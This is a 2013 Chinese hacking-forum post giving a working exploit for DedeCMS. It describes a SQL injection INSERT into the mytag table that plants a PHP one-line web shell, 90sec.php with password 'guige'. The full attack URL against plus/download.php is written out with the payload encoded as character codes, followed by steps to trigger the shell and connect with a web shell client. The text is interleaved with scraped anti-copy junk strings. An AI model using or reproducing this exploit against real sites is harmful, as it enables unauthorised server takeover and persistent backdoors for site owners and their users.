中国网络渗透测试联盟
标题:
dedecms漏洞getshell EXP最新
[打印本页]
作者:
admin
时间:
2013-6-10 16:49
标题:
dedecms漏洞getshell EXP最新
本帖最后由 土豆 于 2013-6-10 14:41 编辑
, b$ H" t2 E4 w, w. Y
' M- q" {7 g' |. Q
- ^& C5 J* m9 X7 y$ m
作者:鬼哥
7 `6 O8 B; D: t. i
8 a( G3 w' U9 u
看贴不回,没JJ
& d! j( B; r! S" }, N- E
' J) f( j! ~- `. f4 g# t
漏洞大家都知道是哪个。
& w( I& S+ V8 \
' h ?. B0 v& {2 R" @: e! F
其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。
2 y M, S3 y' A) A
0 g1 N/ ]) h% _# l7 b6 U1 T$ U1 k, i( q
但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。
9 t' @" B$ C* g: e# Q9 E
/ t% A3 P W; B! J
刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?
l0 |% G4 C. N- K7 T
, f$ K+ T2 _5 i' d8 z1 a
getshell 很容易 。 既然刚发出来的是 sql方法getshell 我也看到几个人发了sql增加表mytag的内容。
. g. s8 ? q$ R7 U
# @/ `/ c% u/ w! l
但是测试了下。。失败
1 _2 F2 y; m x2 E0 H5 f# t( t
, M# T" n5 a- s$ y p: i
原因: 用的语句是update 很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴 错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。
0 j$ O6 e9 z+ O1 z& q- I3 Y, s
/ X) \! P0 h. j+ F3 Z# _
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`
# U) q# Z c2 p! C4 E1 u
4 k# p F9 @, S
EXP:
6 R+ o5 Y* V/ b
$ b9 f- v& n/ o3 z
http://www.xxx.com/plus/download.php?open=1&arrs1
[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
L6 {) n" b8 t
3 L9 O& c$ W4 v4 h; g) Z
1 K" v2 g( [0 k b, n) _/ ]
成功增加。
5 o7 f4 r) T( h4 L8 m3 F
/ x: t. ^8 E5 z" J
访问
http://www.xxx.com/plus/mytag_js.php?aid=9013
2 G j- U/ f( A
生成一句话木马.
5 {6 M) Z. i9 z2 V9 @3 F0 }2 x
菜刀连接
http://www.xxx.com/plus/90sec.php
密码 guige
; r) R/ W5 h8 @" R& N
, R' S4 Y- N9 d1 F
测试OK。
9 h4 h; ?, L2 i9 E
5 J3 W, [+ }0 ?2 e) e6 c
& [+ i& Z8 d0 a3 I+ Z1 M
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2